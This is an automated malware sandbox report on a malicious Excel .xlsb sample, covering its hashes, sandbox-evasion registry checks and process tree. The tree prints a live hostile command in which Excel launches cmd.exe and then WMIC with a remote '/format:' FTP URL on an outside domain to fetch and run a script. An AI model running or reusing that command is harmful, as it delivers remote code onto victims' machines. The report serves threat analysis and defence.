Analysis
max time kernel: 149s
max time network: 128s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12-04-2023 04:05
Behavioral task behavioral1: sample b846fa8bc3a55fa0490a807186a8ece9.xlsb, resource win7-20230220-en
Behavioral task behavioral2: sample b846fa8bc3a55fa0490a807186a8ece9.xlsb, resource win10v2004-20230220-en
General
Target: b846fa8bc3a55fa0490a807186a8ece9.xlsb
Size: 79KB
MD5: b846fa8bc3a55fa0490a807186a8ece9
SHA1: c0c6b99796d732fa53402ff49fd241612a340229
SHA256: 855656bfecc359a1816437223c4a133359e73ecf45acda667610fbe7875ab3c8
SHA512: 18fb97b1a198b4a1336d52e5a363b44ef2d73875fe3b9f6828349403a2b80bcb8e432a37f4672d0f4224d70f28d5112ee897da692e1dc3a02edbf55576b64681
SSDEEP: 1536:s1YKo7aGH8sVHLPzWm4z5eDr6tMEpQGzGo+47hPOV4ko+dNT6MuSS98X:+o7VcsVrd4zC6tMEpso+eE/eMzS6
Malware Config
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3344 | 444 | cmd.exe | EXCEL.EXE
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
pid | process
444 | EXCEL.EXE
Suspicious use of AdjustPrivilegeToken (42 IoCs)
Processes:
WMIC.exe (pid 4716) adjusted the following token privileges; the report records each of these 21 entries twice, giving 42 IoCs:
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Suspicious use of FindShellTrayWindow (2 IoCs)
Processes:
pid | process
444 | EXCEL.EXE (2 occurrences)
Suspicious use of SetWindowsHookEx (12 IoCs)
Processes:
pid | process
444 | EXCEL.EXE (12 occurrences)
Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
description | pid | process | target process
PID 444 wrote to memory of 3344 | 444 | EXCEL.EXE | cmd.exe
PID 444 wrote to memory of 3344 | 444 | EXCEL.EXE | cmd.exe
PID 3344 wrote to memory of 4716 | 3344 | cmd.exe | WMIC.exe
PID 3344 wrote to memory of 4716 | 3344 | cmd.exe | WMIC.exe
Processes
1. C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
   Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b846fa8bc3a55fa0490a807186a8ece9.xlsb"
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of FindShellTrayWindow
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SYSTEM32\cmd.exe (child of 1)
      Command line: cmd.exe /c wmic os get /format:"ftp://0:0@trip.greenulz.com/profile/frontend"
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\Wbem\WMIC.exe (child of 2)
         Command line: wmic os get /format:"ftp://0:0@trip.greenulz.com/profile/frontend"
         - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
file | filesize
memory/444-133-0x00007FFE98C30000-0x00007FFE98C40000-memory.dmp | 64KB
memory/444-135-0x00007FFE98C30000-0x00007FFE98C40000-memory.dmp | 64KB
memory/444-134-0x00007FFE98C30000-0x00007FFE98C40000-memory.dmp | 64KB
memory/444-136-0x00007FFE98C30000-0x00007FFE98C40000-memory.dmp | 64KB
memory/444-137-0x00007FFE98C30000-0x00007FFE98C40000-memory.dmp | 64KB
memory/444-138-0x00007FFE96750000-0x00007FFE96760000-memory.dmp | 64KB
memory/444-139-0x00007FFE96750000-0x00007FFE96760000-memory.dmp | 64KB